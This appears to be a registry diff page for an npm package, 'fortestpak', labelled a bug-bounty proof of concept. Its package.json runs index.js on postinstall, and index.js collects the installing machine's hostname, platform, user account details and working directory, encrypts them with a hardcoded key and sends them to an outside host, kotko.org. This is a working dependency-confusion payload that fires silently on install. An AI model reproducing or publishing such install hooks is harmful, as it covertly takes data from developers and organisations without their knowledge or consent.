fortestpak 0.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of fortestpak might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +1 -0
  2. package/crypto.js +31 -0
  3. package/index.js +39 -0
  4. package/package.json +24 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ Poc by kotko for testing bug.
package/crypto.js ADDED
@@ -0,0 +1,31 @@
1
+ const crypto = require('crypto');
2
+
3
+ const algorithm = 'aes-256-ctr';
4
+ const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
5
+ const iv = crypto.randomBytes(16);
6
+
7
+ const encrypt = (text) => {
8
+
9
+ const cipher = crypto.createCipheriv(algorithm, secretKey, iv);
10
+
11
+ const encrypted = Buffer.concat([cipher.update(text), cipher.final()]);
12
+
13
+ return {
14
+ iv: iv.toString('hex'),
15
+ content: encrypted.toString('hex')
16
+ };
17
+ };
18
+
19
+ const decrypt = (hash) => {
20
+
21
+ const decipher = crypto.createDecipheriv(algorithm, secretKey, Buffer.from(hash.iv, 'hex'));
22
+
23
+ const decrpyted = Buffer.concat([decipher.update(Buffer.from(hash.content, 'hex')), decipher.final()]);
24
+
25
+ return decrpyted.toString();
26
+ };
27
+
28
+ module.exports = {
29
+ encrypt,
30
+ decrypt
31
+ };
package/index.js ADDED
@@ -0,0 +1,39 @@
1
+ var os = require("os");
2
+ const request = require('request');
3
+ const crypto = require('crypto');
4
+ var fs = require('fs');
5
+
6
+
7
+ var hostname = os.hostname();
8
+ var type = os.platform();
9
+ var userInfo = os.userInfo();
10
+ var currentPath = process.cwd();
11
+ var json = [];
12
+
13
+
14
+ const algorithm = 'aes-256-ctr';
15
+ const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
16
+ const iv = crypto.randomBytes(16);
17
+
18
+ json.push(hostname)
19
+ json.push(type)
20
+ json.push(userInfo)
21
+ json.push(currentPath)
22
+ json = JSON.stringify(json);
23
+ const { encrypt, decrypt } = require('./crypto');
24
+
25
+ let hash = encrypt(json);
26
+
27
+
28
+ let company = "fortest"
29
+ let packages = "fortestpak"
30
+
31
+ fs.writeFile('pocByKotko.txt', 'this proof for report', function (err) {
32
+ if (err) throw err;
33
+ });
34
+
35
+ // var dString = JSON.parse(Buffer.from("eyJpdiI6IjUxMjUwOGMzYmMxYmE0YjY5N2ZiZTY1NTMxYTU1OGNhIiwiY29udGVudCI6IjgzM2IzOWVlZTJiMmMxODA3NzBkYmM1YjBiMTYxYTViYzdjODc2NWNiMWYyOWY5MWY5ZTI3MWJhZjBmNDEyZjZhN2I1NGE5YjNjZjZkZjdiY2U5NTQ4YzljN2M5YWQ0ZjAwMjkxYjU2NWUxNDg2ZmQ1MjVmYjhkMmJkZGNiZmY3MzcxMDk3MGFkNjU0ZWYzMjkyZDg1ODUxNDBhNjE2YWE4MjFhMTQ2NTdjYmUyMDcwNjhlZDE3Y2EyNTU1YTA2Y2QyMTgyMWEwNTFlZDc0MTk4M2U4MWEwODA4MGE1ZWQzMjY3MmY4ZjAzNGFjN2M0MGE5Y2ZhOWFiYTUyOGNjNGMwYjE2NmVlOGVkMGIwNTc0NTU0YmM0OWVlZDZmYmE0YmVhZDZiZjY0ZWRlZWVjOTEyZDdlNDY2ZGYzIn0", 'base64'))
36
+ // console.log(decrypt(dString))
37
+
38
+ var buff = Buffer.from(JSON.stringify(hash)).toString("base64");
39
+ request(`https://kotko.org/?${company}:${packages}=${buff}`, (error, response, body) => {})
package/package.json ADDED
@@ -0,0 +1,24 @@
1
+ {
2
+ "name": "fortestpak",
3
+ "version": "0.0.0",
4
+ "description": "This package for demonstrate bugs in program (Bug Bounty program. Do not delete until decision report",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js",
8
+ "preinstall": "npm i request --save-dev",
9
+ "test": "node index.js"
10
+ },
11
+ "author": "",
12
+ "Dependencies": {
13
+ "crypto": "^1.0.1",
14
+ "ip": "^1.1.5",
15
+ "request": "^2.88.2",
16
+ "os": "^0.1.1"
17
+ },
18
+ "devDependencies": {
19
+ "crypto": "^1.0.1",
20
+ "ip": "^1.1.5",
21
+ "os": "^0.1.1",
22
+ "request": "^2.88.2"
23
+ }
24
+ }